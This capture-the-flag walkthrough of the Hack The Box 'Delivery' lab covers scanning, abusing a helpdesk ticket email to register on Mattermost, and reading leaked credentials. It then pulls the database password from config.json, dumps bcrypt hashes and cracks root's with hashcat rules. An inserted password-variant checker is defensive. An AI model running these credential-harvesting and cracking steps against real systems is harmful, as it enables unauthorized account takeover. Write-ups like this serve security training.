# Delivery

10.10.10.222

## Reconnaissance: NMAP

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.222

22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)

80/tcp open  http    nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.222

631/udp  open|filtered ipp
5353/udp open|filtered zeroconf
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1038.41 seconds
```

```
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.222
```

## Enumeration: SSH Port 22/tcp

OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

Based on the OpenSSH version, the host is likely running Debian Buster (10). The HTTP scripts for TCP 8065 show the string “Mattermost”, so it could be an instance of that open source Slack alternative.

## Enumeration: HTTP Port 80/tcp

The site doesn't offer much itself, but it does mention checking out the helpdesk for email-related support:

view-source:<http://10.10.10.222/#>

<http://10.10.10.222/#contact-us>\
@delivery.htb

```
┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts  

10.10.10.222    delivery.htb
10.10.10.222	helpdesk.delivery.htb
```

<http://helpdesk.delivery.htb/>\
<http://delivery.htb:8065/>\
<http://delivery.htb:8065/login>

The link goes to helpdesk.delivery.htb. I’ll add both that subdomain and the base domain (delivery.htb) to my local /etc/hosts file.

The HelpDesk link is the same as the one above. The MatterMost server link is to helpdesk.htb:8065, which explains the other port. There’s also some hint here as to the path. I need to get a @delivery.htb email to get access to the MatterMost server.

helpdesk.htb:8065 \
@delivery.htb

**helpdesk.delivery.htb - TCP 80**

This is an instance of osTicket:

[http://helpdesk.delivery.htb/](<http://helpdesk.delivery.htb/&#xD;&#xA;>)

As a guest user, I can create a ticket: \
And it will give me a page saying it’s been accepted: \
The email to add to the ticket is interesting. I’ll note that.

```
exodus, 

You may check the status of your ticket, by navigating to the Check Status page using ticket id: 4264890.

If you want to add more information to your ticket, just email 4264890@delivery.htb.

Thanks,

Support Team
```

The Sign In link has a form, as well as a registration link: \
On clicking “Create an account” and filling out the form, it gives me a page that says a link has been sent to the email to activate it. On HTB, that’s basically a dead end. If I try to log in, it returns this error: \
If I click the Check Ticket Status link, it asks for an email or ticket number. Because no validation was done of my email when submitting a ticket as a Guest User, I can enter that email and ticket number: \
This page gives the current ticket, with the option to update it:

```
http://helpdesk.delivery.htb/tickets.php
4264890
exodus@htb.eu
```

**delivery.htb - TCP 8065**

The main page here is a login form:

[http://delivery.htb/\
http://delivery.htb:8065/login](<http://delivery.htb/&#xD;&#xA;http://delivery.htb:8065/login>)

The create account link leads to another form: \
Submitting also leads to an email confirmation step: \
Without an email address, not much I can do here.

## Shell as maildeliverer

**Access to MatterMost:** \
The note above suggested that I needed a @delivery.htb email address to get an account. It looks like it will work without one, but practically, I can’t receive emails at an outside account because HTB labs are not connected to the internet.

I did note that when I created a ticket, it offered the ability to update the ticket over email. I can use that to get the verification email.

I’ll create a ticket and get the email address for it. Then sign up for a MatterMost account:

```
4264890@delivery.htb
exodus
Password123$$
```

```
http://helpdesk.delivery.htb/tickets.php
---- Registration Successful ---- 
Please activate your email by going to: 
http://delivery.htb:8065/do_verify_email?token=49zi8zjpe1sabof8xy7ygj5um7hqxex5gmg9ajdancddfspujrdo9siwhfj9kxc8&email=4264890%40delivery.htb 
```

Mattermost lets you share messages and files from your PC or phone, with instant search and archiving. For the best experience, download the apps for PC, Mac, iOS and Android from:

<https://mattermost.com/download/#mattermostApps>

Visiting the link in the ticket verifies the account: \
On logging in, there’s a chance to join a team: \
On joining that team, there’s a single channel, with some chat from root:

```
root
9:29 AM

@developers Please update theme to the OSTicket before we go live.  Credentials to the server are 

maildeliverer:Youve_G0t_Mail! 

Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of "PleaseSubscribe!"
```

I’ll note creds for the account maildeliverer, as well as a hint that a lot of the passwords on the box are variants of “PleaseSubscribe!”, and a note about how Hashcat rules will find the variants.

**SSH:**\
Those creds do work to SSH to the box:

```
┌──(kali💀kali)-[~]
└─$ ssh maildeliverer@10.10.10.222
Youve_G0t_Mail!

maildeliverer@Delivery:~$ whoami
maildeliverer

maildeliverer@Delivery:~$ ls
user.txt
maildeliverer@Delivery:~$ cat user.txt
f085e4----------------------------
```

## Shell as root

**Enumeration:** \
MM Config: Mattermost stores its configuration in /opt/mattermost/config/config.json. The database connection information is in here:

```
maildeliverer@Delivery:~$ cd /opt/mattermost/config
maildeliverer@Delivery:/opt/mattermost/config$ ls
cloud_defaults.json  config.json  README.md

        "GfycatApiSecret": "3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof",

    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
```

The database password is there, along with a hint as to where to go next.

**SQL:**\
I’ll connect to the DB with the creds in the config above:

```sql
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -pCrack_The_MM_Admin_PW mattermost

MariaDB [mattermost]> 
```

There’s only the default DB and mattermost:

```sql
MariaDB [mattermost]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mattermost         |
+--------------------+
```

I can see from the prompt that I’m already using the mattermost db, but if I needed to switch, `use mattermost` would do that. The mattermost database has a lot of tables:

```sql
MariaDB [mattermost]> show tables;
+------------------------+
| Tables_in_mattermost   |
+------------------------+
| Audits                 |
| Bots                   |
| ChannelMemberHistory   |
| ChannelMembers         |
| Channels               |
| ClusterDiscovery       |
| CommandWebhooks        |
| Commands               |
| Compliances            |
| Emoji                  |
| FileInfo               |
| GroupChannels          |
| GroupMembers           |
| GroupTeams             |
| IncomingWebhooks       |
| Jobs                   |
| Licenses               |
| LinkMetadata           |
| OAuthAccessData        |
| OAuthApps              |
| OAuthAuthData          |
| OutgoingWebhooks       |
| PluginKeyValueStore    |
| Posts                  |
| Preferences            |
| ProductNoticeViewState |
| PublicChannels         |
| Reactions              |
| Roles                  |
| Schemes                |
| Sessions               |
| SidebarCategories      |
| SidebarChannels        |
| Status                 |
| Systems                |
| TeamMembers            |
| Teams                  |
| TermsOfService         |
| ThreadMemberships      |
| Threads                |
| Tokens                 |
| UploadSessions         |
| UserAccessTokens       |
| UserGroups             |
| UserTermsOfService     |
| Users                  |
+------------------------+
```

I’ll start with the users table:

```sql
MariaDB [mattermost]> select Username,Password from Users;
+----------------------------------+--------------------------------------------------------------+
| Username                         | Password                                                     |
+----------------------------------+--------------------------------------------------------------+
| surveybot                        |                                                              |
| c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
| 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| exodus                           | $2a$10$yjkicDs/LIqpEYOubdn0zODZ6oY0ULXd8mtkvHGk8FNmAaTR1vUVu |
| ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
| channelexport                    |                                                              |
| 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+----------------------------------+--------------------------------------------------------------+
```

A lot of those look like other users or me. I’ll focus on the root user.

**Crack Password:** \
I’ll drop the hash into a file:

```
┌──(kali💀kali)-[~/Desktop]
└─$ nano hash  

┌──(kali💀kali)-[~/Desktop]
└─$ cat hash       
root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
```

Based on the comments from Mattermost, I’ll create a file with the password:

```
┌──(kali💀kali)-[~/Desktop]
└─$ nano password

┌──(kali💀kali)-[~/Desktop]
└─$ cat password
PleaseSubscribe!
```

Now I can run with a rule file to get different variations on the passwords in the file (just one in this case). There are many in /usr/share/hashcat/rules, but why not start with the one called “best”:

```
┌──(kali💀kali)-[~/Desktop]
└─$ hashcat -m 3200 hash password --user -r /usr/share/hashcat/rules/best64.rule 

$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
Time.Started.....: Wed Jan 24 07:11:26 2024 (2 secs)
Time.Estimated...: Wed Jan 24 07:11:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (password)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:        8 H/s (0.35ms) @ Accel:6 Loops:8 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 21/77 (27.27%)
Rejected.........: 0/21 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:20-21 Iteration:1016-1024
Candidate.Engine.: Device Generator
Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
Hardware.Mon.#1..: Util: 18%

Started: Wed Jan 24 07:10:37 2024
Stopped: Wed Jan 24 07:11:29 2024
```

It cracks pretty quickly.
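The chat message asked for a program to stop passwords that are variants of a known base, and the rule-based run above shows why appended digits add nothing. A sketch of such a check for password-change time, as an added example that is not part of the original write-up; `skeleton`, `is_variant`, the substitution table and the edit threshold are illustrative choices:

```python
import re

# Reverse the character swaps that users and cracking rules commonly apply.
LEET = str.maketrans({"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s"})

def skeleton(password):
    """Comparison key: edge digits/punctuation stripped, lowercased, de-leeted."""
    core = re.sub(r"^[\d\W_]+|[\d\W_]+$", "", password)
    return core.lower().translate(LEET)

def edit_distance(a, b):
    """Levenshtein distance, two-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def is_variant(candidate, banned_bases, max_edits=2):
    """Return the banned base that candidate derives from, or None."""
    cand = skeleton(candidate)
    for base in banned_bases:
        key = skeleton(base)
        if not key:
            continue
        for form in (cand, cand[::-1]):  # also catch the reversed spelling
            if key in form or edit_distance(form, key) <= max_edits:
                return base
    return None

BANNED = ["PleaseSubscribe!"]  # base named in the chat message above

if __name__ == "__main__":
    for pw in ["PleaseSubscribe!21", "pl3as3subscr1be2024", "Youve_G0t_Mail!"]:
        print(pw, "->", is_variant(pw, BANNED))
```

The edit threshold suits long bases like this one; with short banned words it would reject unrelated passwords, so scale it to the base length in real use.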

**su:**\
That password works for the root account on Delivery:

```
maildeliverer@Delivery:/opt/mattermost/config$ su -
Password: PleaseSubscribe!21

root@Delivery:~# whoami
root

root@Delivery:~# ls
mail.sh  note.txt  py-smtp.py  root.txt

root@Delivery:~# cat root.txt
064c3fd----------------------------
```


